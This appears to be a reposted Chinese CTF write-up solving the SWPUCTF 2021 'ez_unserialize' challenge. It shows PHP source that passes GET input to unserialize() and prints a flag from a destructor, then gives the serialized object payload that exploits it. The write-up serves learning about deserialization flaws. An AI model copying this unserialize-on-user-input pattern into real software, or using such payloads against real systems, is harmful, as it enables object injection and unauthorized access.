反序列化 [SWPUCTF 2021 新生赛]ez_unserialize

2023-12-21 00:06:17

打开题目

查看源代码

得到提示,那我们用御剑扫描一下看看

我们知道有个robots.txt,访问一下得到

那我们便访问一下 cl45s.php看看

得到网站源代码

 <?php

error_reporting(0);
show_source("cl45s.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?> 

如果我们admin=admin,password=ctf,则输出flag,其中对我们get传入的p进行了反序列化操作

O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}?

得到flag

文章来源:https://blog.csdn.net/m0_75178803/article/details/135117750
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。